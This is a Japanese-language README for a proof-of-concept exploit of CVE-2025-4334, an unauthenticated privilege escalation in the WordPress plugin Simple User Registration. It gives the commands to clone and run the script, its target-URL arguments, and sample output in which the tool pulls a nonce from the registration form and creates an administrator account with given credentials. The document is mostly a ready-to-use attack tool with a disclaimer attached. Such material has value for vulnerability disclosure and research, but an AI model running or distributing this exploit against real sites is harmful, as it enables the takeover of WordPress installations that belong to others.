
CVE-2025-4334の概念実証エクスプロイト。WordPressプラグイン「Simple User Registration」(<= 6.3)の権限昇格の脆弱性で、認証されていない攻撃者が管理者アカウントを作成できるようにするものです。
Exploit Title: Simple User Registration <= 6.3 – Unauthenticated Privilege Escalation Author: Gaurav Bhattacharjee (0xgh057r3c0n) CVE ID: CVE-2025-4334
このエクスプロイトは、WordPress用のSimple User Registrationプラグイン (<= v6.3) の脆弱性を標的とし、認証されていない攻撃者が権限を昇格させて新しい管理者アカウントを作成することを可能にします。
リポジトリをクローンし、必要なPython依存関係をインストールします:
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt
依存関係:
requestscoloramapython3 CVE-2025-4334.py -u <base_url> --form <form_url>
引数:
-u / --url → WordPressのベースURL(例:https://target.com/wordpress/)--form → 登録フォームの完全なURL(例:https://target.com/wpr/default-registration/)例:
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
[*] Fetching form details...
[i] Extracted Nonce : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response : {"success":true,"user_id":2}
[+] Exploitation Successful
[+] Username : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name : 0xgh057r3c0nadmin
[+] Email : [email protected]
[+] Password : Wiz007@8876@
[+] Role : administrator
Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)
このツールは教育および研究目的でのみ提供されています。 許可なくシステムに対して不正に使用することは違法です。 作者は悪用に対する一切の責任を負いません。
このプロジェクトはMITライセンスの下でライセンスされています。